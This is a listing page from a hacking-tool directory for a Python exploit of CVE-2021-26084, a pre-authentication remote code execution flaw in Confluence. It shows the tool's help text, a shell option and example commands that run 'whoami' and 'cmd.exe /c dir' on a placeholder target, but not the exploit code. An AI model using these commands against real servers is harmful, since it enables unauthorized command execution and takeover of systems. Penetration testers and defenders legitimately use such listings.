Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-26084_Confluence — CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显 | Kitploit
Tools/GitHubGitHub/prettyrecon/cve-2021-26084_confluence
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubprettyrecon/cve-2021-26084_confluence

CVE-2021-26084_Confluence

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显

View Repository
132465 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

Usage

  • root@kitploit:~
    usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell]
    
    CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
    
    optional arguments:
      -h, --help         show this help message and exit
      --url URL, -u URL  Target Url
      --cmd CMD, -c CMD  Command
      --shell            Get shell
    
  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "whoami"
    

    1630484082986

  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "cmd.exe /c dir"
    

    1630484112292

Reference:

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Download Tool